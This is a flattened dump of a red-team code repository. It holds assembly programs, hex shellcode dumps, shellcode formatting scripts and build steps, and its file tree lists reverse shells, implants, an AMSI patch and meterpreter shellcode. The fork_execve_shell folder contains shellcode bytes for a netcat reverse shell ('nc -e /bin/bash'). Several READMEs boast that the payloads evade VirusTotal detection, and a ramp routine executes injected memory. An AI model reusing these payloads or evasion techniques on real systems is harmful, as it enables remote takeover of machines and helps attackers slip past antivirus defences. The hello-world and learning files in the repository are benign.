│ │ ├── reverse.dll
│ │ ├── reverseDLL.bin
│ │ └── reverseDLL.cpp
│ │ ├── reverseEXE.bin
│ │ └── reverseEXE.txt
├── message_box
│ ├── Readme.md
│ ├── message_box.cpp
│ └── message_box.exe
├── recursion_off_the_disk
│ ├── ROTD
│ │ ├── ROTD.exe
│ │ ├── ROTD.pdb
│ │ ├── ROTD_orig.exe
│ │ ├── compile.bat
│ │ ├── favicon.ico
│ │ ├── resources.h
│ │ ├── resources.o
│ │ ├── resources.rc
│ │ ├── resources.res
│ │ ├── reverse_shell.bin
│ │ ├── rotd.cpp
│ │ ├── rotd.obj
│ │ └── xorencrypt.py
│ ├── Readme.md
│ └── reverse_shell
│ │ ├── compile.bat
│ │ ├── reverse_shell.cpp
│ │ ├── reverse_shell.exe
│ │ └── reverse_shell.obj
├── rsrc_injection
│ ├── Readme.md
│ ├── compile.bat
│ ├── favicon.ico
│ ├── implant.cpp
│ ├── implant.exe
│ ├── implant.obj
│ ├── msgbox64.bin
│ ├── resources.h
│ ├── resources.o
│ ├── resources.rc
│ ├── resources.res
│ └── xorencrypt.py
└── rsrc_injection_shell
│ ├── Readme.md
│ ├── compile.bat
│ ├── favicon.ico
│ ├── implant.cpp
│ ├── implant.exe
│ ├── implant.obj
│ ├── implant_noemul.exe
│ ├── resources.h
│ ├── resources.o
│ ├── resources.rc
│ ├── resources.res
│ ├── reverse_shell
│ ├── compile.bat
│ ├── reverse_shell.cpp
│ ├── reverse_shell.exe
│ ├── reverse_shell.obj
│ └── shell.bin
│ ├── shell.bin
│ └── xorencrypt.py
├── LICENSE.md
├── Powershell
├── Readme.md
└── amsi-patch.ps1
├── Presentations
├── .placeholder
└── Building Skynet_as_submitted.pptx
├── Python
├── PushingP
│ ├── pushingpayloads.py
│ └── pushingpayloadsv3.py
├── Readme.md
├── smuggler
│ ├── OUT
│ │ └── test.txt
│ ├── Readme.md
│ ├── in.txt
│ ├── out.txt
│ ├── smuggler.py
│ └── test.txt
└── utilities
│ ├── Readme.md
│ ├── aesencrypt.py
│ ├── beautify.py
│ └── xorencrypt.py
├── Readme.md
└── Rust
├── CreateProcessA
├── Cargo.toml
├── Readme.md
└── main.rs
├── Readme.md
├── peruns_fart
├── Cargo.toml
├── Readme.md
└── main.rs
├── rust_implantv1
├── implant_rust.exe
└── main.rs
├── rust_implantv2
├── Cargo.toml
├── Readme.md
├── main.rs
└── rusty_implant.exe
├── rust_implantv3
├── Cargo.toml
├── Readme.md
├── main.rs
└── rusty_implantv3.exe
├── rust_implantv4
├── Cargo.toml
├── Readme.md
├── main.rs
└── rusty_implantv4.exe
└── rusty_calc
├── Cargo.toml
├── Readme.md
├── main-original.rs
└── main.rs
/Assembly/Linx86-64/Readme.md:
--------------------------------------------------------------------------------
1 | Assembly programs and executables for Linux (x86_64)
2 |
3 | Developed on Kali Linux
4 |
5 | nasm -f elf64 -o PROGRAM_NAME.o PROGRAM_NAME.asm -l PROGRAM_NAME.assembly
6 |
7 | ld -g PROGRAM_NAME.o -o PROGRAM_NAME.bin
8 |
9 |
--------------------------------------------------------------------------------
/Assembly/Linx86-64/call_program/call_me:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/call_program/call_me
--------------------------------------------------------------------------------
/Assembly/Linx86-64/call_program/call_me.asm:
--------------------------------------------------------------------------------
1 | global _start
2 | section .rodata
3 | msg: db "Hello, world!", 10
4 | msglen: equ $ - msg
5 | a: db 10
6 | b: db 10
7 | c: db 10
8 | d: db 10
9 | e: db 10
10 | f: db 10
11 | g: db 10
12 | h: db 10
13 | i: db 10
14 | j: db 10
15 |
16 | section .text
17 |
18 | _start:
19 | push _start+0x7
20 | jmp _step
21 | mov rax, 0
22 |
23 | mov rax, 60 ;SYS EXIT
24 | mov rdi, 0 ;
25 | syscall ;
26 |
27 | _step:
28 | push _step_2
29 | mov al, [a]
30 | mov bl, [b]
31 | mov cl, [c]
32 | mov dl, [d]
33 | ret
34 |
35 | _step_2:
36 | push rax
37 | add rax, rbx
38 | add rax, rcx
39 | add rax, rdx
40 | mov rbx, rax
41 | add rsp, 0x8
42 | ret
43 |
44 |
--------------------------------------------------------------------------------
/Assembly/Linx86-64/call_program/call_me.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/call_program/call_me.o
--------------------------------------------------------------------------------
/Assembly/Linx86-64/execve/Readme.md:
--------------------------------------------------------------------------------
1 | A more performant way of generating custom shellcode. Rather than clunky manual stack manipulations we're able to leverage NASM's ability to generate
2 | relative addresses to generate injectable shell code.
3 |
--------------------------------------------------------------------------------
/Assembly/Linx86-64/execve/beautify.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | __author__ = "0xTriboulet"
4 |
5 | with open("dump.txt") as f:
6 | lines = f.readlines()
7 | last = lines[-1]
8 | print("unsigned char cmd[] = ")
9 | for line in lines:
10 | new_line = []
11 | for i in range (0,len(line)-1,2):
12 | new_line.append("\\x"+line[i:i+2])
13 | if line is last:
14 | print('"'+''.join(new_line)+'";')
15 | else:
16 | print('"'+''.join(new_line)+'"')
17 |
--------------------------------------------------------------------------------
/Assembly/Linx86-64/execve/call_me:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/execve/call_me
--------------------------------------------------------------------------------
/Assembly/Linx86-64/execve/call_me.asm:
--------------------------------------------------------------------------------
1 | DEFAULT REL
2 |
3 | ; nasm -f elf64 -o call_me.o call_me.asm -l call_me.assembly -O0
4 | ; ld -m elf_x86_64 -o call_me call_me.o
5 |
6 | global _start
7 |
8 | section .text
9 |
10 | _start:
11 |
12 | mov rbp, rsp ; build stack
13 | sub rsp, 0x48
14 |
15 | mov rax, 59 ; execve
16 |
17 | xor rcx, rcx ; clear stack
18 | push rcx
19 |
20 | lea rcx, [rel arg1] ; push arguments
21 | push rcx
22 |
23 | lea rcx, [rel arg0] ; push command
24 | push rcx
25 |
26 | lea rdi, [rel arg0] ;cmd
27 | lea rsi, [rsp] ;args
28 | xor rdx, rdx ;env
29 | syscall
30 |
31 | xor rdi, rdi
32 | mov rax, 60
33 | syscall
34 |
35 | arg0: db "/usr/bin/echo", 0 ; COMMAND GOES HERE
36 | arg1: db "PAYLOAD GOES HERE!", 10, 0, 0 ; ARGUMENTS GO HERE
37 |
--------------------------------------------------------------------------------
/Assembly/Linx86-64/execve/call_me.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/execve/call_me.o
--------------------------------------------------------------------------------
/Assembly/Linx86-64/execve/call_me.so:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/execve/call_me.so
--------------------------------------------------------------------------------
/Assembly/Linx86-64/execve/dump.txt:
--------------------------------------------------------------------------------
1 | 4889e54881ec4800000048b83b000000
2 | 000000004831c951488d0d3600000051
3 | 488d0d2000000051488d3d1800000048
4 | 8d34244831d20f054831ff48b83c0000
5 | 00000000000f052f7573722f62696e2f
6 | 6563686f005041594c4f414420474f45
7 | 532048455245210a0000
8 |
--------------------------------------------------------------------------------
/Assembly/Linx86-64/execve/system.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/execve/system.bin
--------------------------------------------------------------------------------
/Assembly/Linx86-64/execve/system_O3.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/execve/system_O3.bin
--------------------------------------------------------------------------------
/Assembly/Linx86-64/fork_execve/Readme.md:
--------------------------------------------------------------------------------
1 | This exercises develops a payload that calls fork(), then executes our standard /usr/bin/echo payload within the child process.
2 |
--------------------------------------------------------------------------------
/Assembly/Linx86-64/fork_execve/beautify.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | __author__ = "0xTriboulet"
4 |
5 | with open("dump.txt") as f:
6 | lines = f.readlines()
7 | last = lines[-1]
8 | print("unsigned char cmd[] = ")
9 | for line in lines:
10 | new_line = []
11 | for i in range (0,len(line)-1,2):
12 | new_line.append("\\x"+line[i:i+2])
13 | if line is last:
14 | print('"'+''.join(new_line)+'";')
15 | else:
16 | print('"'+''.join(new_line)+'"')
17 |
--------------------------------------------------------------------------------
/Assembly/Linx86-64/fork_execve/call_me:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/fork_execve/call_me
--------------------------------------------------------------------------------
/Assembly/Linx86-64/fork_execve/call_me.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/fork_execve/call_me.o
--------------------------------------------------------------------------------
/Assembly/Linx86-64/fork_execve/dump.txt:
--------------------------------------------------------------------------------
1 | 4889e54881ec480000004831c95148b8
2 | 39000000000000000f05488d0d1e0000
3 | 00488d1d0c000000483d00000000480f
4 | 44cbffe14881c4480000004889ecc348
5 | b83b00000000000000488d0d27000000
6 | 51488d0d1100000051488d3d09000000
7 | 488d34244831d20f052f7573722f6269
8 | 6e2f6563686f005041594c4f41442047
9 | 4f45532048455245210a0000
10 |
--------------------------------------------------------------------------------
/Assembly/Linx86-64/fork_execve/how-to:
--------------------------------------------------------------------------------
1 | nasm -f elf64 -o call_me.o call_me.asm -l call_me.assembly -O3
2 | ld -m elf_x86_64 -N -s -o call_me call_me.o
3 | hexdump ./call_me -v -e '16/1 "%02x" "\n"' -n 300 > dump.txt
4 | python beautify.py
5 | copy into payload section of system.c
6 | gcc -m64 -g system.c -o system.bin -O0
7 | ./system.bin
8 |
9 |
--------------------------------------------------------------------------------
/Assembly/Linx86-64/fork_execve/system.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/fork_execve/system.bin
--------------------------------------------------------------------------------
/Assembly/Linx86-64/fork_execve/useful.txt:
--------------------------------------------------------------------------------
1 | hexdump -s 0x1139 ./payload.bin -v -e '16/1 "%02x" "\n"' -n 200
2 |
--------------------------------------------------------------------------------
/Assembly/Linx86-64/fork_execve_shell/Readme.md:
--------------------------------------------------------------------------------
1 | This payload implements a fork followed by a nc reverse shell in the child process.
2 |
3 |
4 | 
5 |
6 |
7 | The importance of our methodology is validated if we generate a standard msfvenom payload and upload it to virustotal.
8 | 
9 |
10 |
11 | 
12 |
13 |
14 | We can compare this with our custom system.bin file that we've crafted, and here are the results!
15 | 
16 |
--------------------------------------------------------------------------------
/Assembly/Linx86-64/fork_execve_shell/beautify.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python3
2 |
3 | __author__ = "0xTriboulet"
4 |
5 | with open("dump.txt") as f:
6 | lines = f.readlines()
7 | last = lines[-1]
8 | print("unsigned char cmd[] = ")
9 | for line in lines:
10 | new_line = []
11 | for i in range (0,len(line)-1,2):
12 | new_line.append("\\x"+line[i:i+2])
13 | if line is last:
14 | print('"'+''.join(new_line)+'";')
15 | else:
16 | print('"'+''.join(new_line)+'"')
17 |
--------------------------------------------------------------------------------
/Assembly/Linx86-64/fork_execve_shell/call_me:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/fork_execve_shell/call_me
--------------------------------------------------------------------------------
/Assembly/Linx86-64/fork_execve_shell/call_me.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/fork_execve_shell/call_me.o
--------------------------------------------------------------------------------
/Assembly/Linx86-64/fork_execve_shell/dump.txt:
--------------------------------------------------------------------------------
1 | 4889e54881ec480000004831c9515151
2 | 5151595959595948b839000000000000
3 | 000f05488d0d13000000488d1d170000
4 | 00483d00000000480f44cbffe14881c4
5 | 480000004889ecc348b83b0000000000
6 | 0000488d0d5400000051488d0d420000
7 | 0051488d0d3000000051488d0d250000
8 | 0051488d0d1100000051488d3d090000
9 | 00488d34244831d20f052f7573722f62
10 | 696e2f6e63002d65002f62696e2f6261
11 | 7368003132372e302e302e3100393030
12 | 310000
13 |
--------------------------------------------------------------------------------
/Assembly/Linx86-64/fork_execve_shell/how-to:
--------------------------------------------------------------------------------
1 | nasm -f elf64 -o call_me.o call_me.asm -l call_me.assembly -O3
2 | ld -m elf_x86_64 -N -s -o call_me call_me.o
3 | hexdump ./call_me -v -e '16/1 "%02x" "\n"' -n 300 > dump.txt
4 | python beautify.py
5 | copy into payload section of system.c
6 | gcc -m64 -g system.c -o system.bin -O0
7 | ./system.bin
8 |
9 |
--------------------------------------------------------------------------------
/Assembly/Linx86-64/fork_execve_shell/system.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/fork_execve_shell/system.bin
--------------------------------------------------------------------------------
/Assembly/Linx86-64/fork_execve_shell/useful.txt:
--------------------------------------------------------------------------------
1 | hexdump -s 0x1139 ./payload.bin -v -e '16/1 "%02x" "\n"' -n 200
2 |
--------------------------------------------------------------------------------
/Assembly/Linx86-64/hello_world/hello:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/hello_world/hello
--------------------------------------------------------------------------------
/Assembly/Linx86-64/hello_world/hello.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/hello_world/hello.o
--------------------------------------------------------------------------------
/Assembly/Linx86-64/hello_world/hello_world.asm:
--------------------------------------------------------------------------------
1 | global _start
2 |
3 | section .text
4 |
5 | _start:
6 | mov rax, 1 ; write(
7 | mov rdi, 1 ; STDOUT_FILENO,
8 | mov rsi, msg ; "Hello, world!\n",
9 | mov rdx, msglen ; sizeof("Hello, world!\n")
10 | syscall ; );
11 |
12 | mov rax, 60 ; exit(
13 | mov rdi, 0 ; EXIT_SUCCESS
14 | syscall ; );
15 |
16 | section .rodata
17 | msg: db "Hello, world!", 10
18 | msglen: equ $ - msg
19 |
--------------------------------------------------------------------------------
/Assembly/Linx86-64/print_args/print_args:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/print_args/print_args
--------------------------------------------------------------------------------
/Assembly/Linx86-64/print_args/print_args.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/print_args/print_args.o
--------------------------------------------------------------------------------
/Assembly/Linx86-64/push_ret/test:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/push_ret/test
--------------------------------------------------------------------------------
/Assembly/Linx86-64/push_ret/test.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/push_ret/test.bin
--------------------------------------------------------------------------------
/Assembly/Linx86-64/push_ret/test.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Linx86-64/push_ret/test.o
--------------------------------------------------------------------------------
/Assembly/Readme.md:
--------------------------------------------------------------------------------
1 | Assembly programs designed for educational purposes. Assembly is essential to understand for payload crafting, reverse engineering, and malware development.
2 |
--------------------------------------------------------------------------------
/Assembly/Winx32/Readme.md:
--------------------------------------------------------------------------------
1 | Win32 programs written in assembly.
2 |
3 | nasm -f win32 PROGRAM_NAME.asm -o PROGRAM_NAME.obj -l PROGRAM_NAME.assembly
4 |
5 | gcc PROGRAM_NAME.obj -o PROGRAM_NAME.exe
6 |
--------------------------------------------------------------------------------
/Assembly/Winx32/hellow.asm:
--------------------------------------------------------------------------------
1 | global _main ; declare main() method
2 | extern _printf ; link to external library
3 | segment .data
4 | message: db 'Hello world!', 0xA, 0
5 | message_2: db 'Hello again!!', 0xA, 0
6 | section .text
7 | _other_2:
8 | push message_2
9 | call _printf
10 | pop edi
11 | ret
12 | _other:
13 | push message
14 | call _printf
15 | pop edi
16 | ret
17 | _main:
18 | push _main+0xc
19 | mov edi, _other
20 | jmp edi
21 | push _main+0x18
22 | mov edi, _other_2
23 | jmp edi
24 | add esp, 4
25 | ret
26 | ; compile with nasm -f win32 hellow.asm
27 | ; link with gcc hellow.obj -o hellow.exe
--------------------------------------------------------------------------------
/Assembly/Winx32/hellow.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx32/hellow.exe
--------------------------------------------------------------------------------
/Assembly/Winx32/hellow.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx32/hellow.obj
--------------------------------------------------------------------------------
/Assembly/Winx64/Readme.md:
--------------------------------------------------------------------------------
1 | Win64 programs written in assembly. I prefer to use link for this architecture in order to leverage Windows function calls more easily.
2 |
3 | nasm -f win64 hello.asm -o hello_new.obj -l hello_new.assembly
4 |
5 | link /entry:start /subsystem:console hello_new.obj kernel32.lib"
6 |
--------------------------------------------------------------------------------
/Assembly/Winx64/asm_1/hello-win.asm:
--------------------------------------------------------------------------------
1 | extern GetStdHandle
2 | extern WriteFile
3 | extern ExitProcess
4 |
5 | section .rodata
6 |
7 | msg db "Hello World!", 0x0d, 0x0a
8 |
9 | msg_len equ $-msg
10 | stdout_query equ -11
11 | status equ 0
12 |
13 | section .data
14 |
15 | stdout dw 0
16 | bytesWritten dw 0
17 |
18 | section .text
19 |
20 | global start
21 |
22 | start:
23 | mov rcx, stdout_query
24 | call GetStdHandle
25 | mov [rel stdout], rax
26 |
27 | mov rcx, [rel stdout]
28 | mov rdx, msg
29 | mov r8, msg_len
30 | mov r9, bytesWritten
31 | push qword 0
32 | call WriteFile
33 |
34 | mov rcx, status
35 | call ExitProcess
--------------------------------------------------------------------------------
/Assembly/Winx64/asm_1/hello-win.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_1/hello-win.exe
--------------------------------------------------------------------------------
/Assembly/Winx64/asm_1/hello-win.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_1/hello-win.obj
--------------------------------------------------------------------------------
/Assembly/Winx64/asm_1/hello64.asm:
--------------------------------------------------------------------------------
1 | extern printf
2 |
3 | section .data
4 | msg db 'Hello World!'
5 | section .text
6 | global main
7 | main:
8 | ;write your code here
9 | push rbp
10 | mov rbp, rsp
11 |
12 | mov rcx, msg
13 | sub rsp, 32
14 | call printf
15 | add rsp, 32
16 |
17 | leave
18 | ret
--------------------------------------------------------------------------------
/Assembly/Winx64/asm_1/hello64.fas:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_1/hello64.fas
--------------------------------------------------------------------------------
/Assembly/Winx64/asm_1/hello64.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_1/hello64.obj
--------------------------------------------------------------------------------
/Assembly/Winx64/asm_1/make:
--------------------------------------------------------------------------------
1 | hello.exe: hello64.obj
2 | gcc -o hello64.exe -g hello64.obj
3 | hello.obj: hello64.asm
4 | nasm -f win64 -F cv8 hello64.asm -l hello64.lst
--------------------------------------------------------------------------------
/Assembly/Winx64/asm_1/test.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_1/test.exe
--------------------------------------------------------------------------------
/Assembly/Winx64/asm_1/test64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_1/test64.exe
--------------------------------------------------------------------------------
/Assembly/Winx64/asm_2/hello.asm:
--------------------------------------------------------------------------------
1 | extern GetStdHandle
2 | extern WriteFile
3 | extern ExitProcess
4 |
5 | section .rodata
6 |
7 | msg db "Hello World!", 0x0d, 0x0a
8 |
9 | msg_len equ $-msg
10 | stdout_query equ -11
11 | status equ 0
12 |
13 | section .data
14 |
15 | stdout dw 0
16 | bytesWritten dw 0
17 |
18 | section .text
19 |
20 | global start
21 |
22 | start:
23 | mov rcx, stdout_query
24 | call GetStdHandle
25 | mov [rel stdout], rax
26 |
27 | mov rcx, [rel stdout]
28 | mov rdx, msg
29 | mov r8, msg_len
30 | mov r9, bytesWritten
31 | push qword 0
32 | call WriteFile
33 |
34 | mov rcx, status
35 | call ExitProcess
36 | ;nasm -f win64 hello.asm -o hello_new.obj -l hello_new.assembly
37 | ;link /entry:start /subsystem:console hello_new.obj kernel32.lib"
38 |
--------------------------------------------------------------------------------
/Assembly/Winx64/asm_2/hello.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_2/hello.exe
--------------------------------------------------------------------------------
/Assembly/Winx64/asm_2/hello_new.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_2/hello_new.exe
--------------------------------------------------------------------------------
/Assembly/Winx64/asm_2/hello_new.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/asm_2/hello_new.obj
--------------------------------------------------------------------------------
/Assembly/Winx64/call_stack/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Assembly/Winx64/call_stack/main_clean.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/call_stack/main_clean.exe
--------------------------------------------------------------------------------
/Assembly/Winx64/call_stack/ramp.asm:
--------------------------------------------------------------------------------
1 | section .text
2 | default rel
3 | bits 64
4 |
5 | global onRamp
6 | global offRamp
7 |
8 | ;nasm -f win64 ramp.asm -o ramp.o
9 | onRamp: ; onRamp(exec_mem, return_address) where &exec_mem in rcx
10 | pop rax ; corrupt previous frame
11 | push rdx
12 | lea rax, [offRamp] ; get offRemp address
13 | push rax ; if payload returns, it'll return to our off ramp
14 | jmp rcx ; execute exec_mem
15 |
16 | offRamp: ; slide back into normal execution (dangerous!)
17 | mov rax, [r13] ; get return_address
18 | jmp rax ; jump to return_address
19 | nop ; This works for the demonstration but depending on your implant/payload you'll need custom offRamps
--------------------------------------------------------------------------------
/Assembly/Winx64/payloads/1.popcalc/popcalc.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/1.popcalc/popcalc.exe
--------------------------------------------------------------------------------
/Assembly/Winx64/payloads/1.popcalc/popcalc.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/1.popcalc/popcalc.o
--------------------------------------------------------------------------------
/Assembly/Winx64/payloads/2.cmd/new_cmd.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/2.cmd/new_cmd.exe
--------------------------------------------------------------------------------
/Assembly/Winx64/payloads/2.cmd/new_cmd.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/2.cmd/new_cmd.o
--------------------------------------------------------------------------------
/Assembly/Winx64/payloads/3.powershell_multi_command/new_powershell.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/3.powershell_multi_command/new_powershell.exe
--------------------------------------------------------------------------------
/Assembly/Winx64/payloads/3.powershell_multi_command/new_powershell.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/3.powershell_multi_command/new_powershell.o
--------------------------------------------------------------------------------
/Assembly/Winx64/payloads/4.changable_api/Readme.md:
--------------------------------------------------------------------------------
1 | 0-null byte WinExec payload with a changeable commond and reworked for a changeable API. CreateProcessA is probably going to be the next API I try to work from this skeleton
2 |
--------------------------------------------------------------------------------
/Assembly/Winx64/payloads/4.changable_api/any_api.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/4.changable_api/any_api.exe
--------------------------------------------------------------------------------
/Assembly/Winx64/payloads/4.changable_api/any_api.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/4.changable_api/any_api.o
--------------------------------------------------------------------------------
/Assembly/Winx64/payloads/5.ZeroTotal/Readme.md:
--------------------------------------------------------------------------------
1 | Payloads designed to bypass all VirusTotal checks at the time of development.
2 |
--------------------------------------------------------------------------------
/Assembly/Winx64/payloads/5.ZeroTotal/calc/calc_binja.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/5.ZeroTotal/calc/calc_binja.bin
--------------------------------------------------------------------------------
/Assembly/Winx64/payloads/6.meterpreter/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Assembly/Winx64/payloads/6.meterpreter/meterpreter_stageless.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Assembly/Winx64/payloads/6.meterpreter/meterpreter_stageless.bin
--------------------------------------------------------------------------------
/Assembly/Winx64/payloads/Readme.md:
--------------------------------------------------------------------------------
1 | Payloads based on:
2 |
3 | https://www.exploit-db.com/exploits/49819
4 | by Bobby Cooke (boku)
5 |
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/CreateProcess.csproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 | Exe
5 | netcoreapp3.1
6 |
7 |
8 |
9 |
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.deps.json:
--------------------------------------------------------------------------------
1 | {
2 | "runtimeTarget": {
3 | "name": ".NETCoreApp,Version=v3.1",
4 | "signature": ""
5 | },
6 | "compilationOptions": {},
7 | "targets": {
8 | ".NETCoreApp,Version=v3.1": {
9 | "CreateProcess/1.0.0": {
10 | "runtime": {
11 | "CreateProcess.dll": {}
12 | }
13 | }
14 | }
15 | },
16 | "libraries": {
17 | "CreateProcess/1.0.0": {
18 | "type": "project",
19 | "serviceable": false,
20 | "sha512": ""
21 | }
22 | }
23 | }
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.dll
--------------------------------------------------------------------------------
/C#/CreateProcess/CreateProcess/bin/Debug/netcoreapp3.1/CreateProcess.exe:
--------------------------------------------------------------------------------
